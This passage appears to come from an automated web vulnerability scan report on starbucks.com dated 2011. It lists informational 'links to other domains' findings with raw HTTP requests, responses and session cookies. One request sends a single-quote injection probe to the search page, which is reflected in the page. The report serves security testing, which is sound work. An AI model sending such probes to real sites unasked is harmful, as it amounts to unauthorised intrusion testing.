<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.3. http://www.starbucks.com/menu/catalog/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains the following links to other domains (see the response body below):

Request

GET /menu/catalog/nutrition?food=bakery HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:58 GMT
Connection: close
Content-Length: 50149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?food=bakery" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.4. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains the following links to other domains (see the response body below):

Request

GET /search?keywords=%27 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:21 GMT
Content-Length: 33802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.5. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

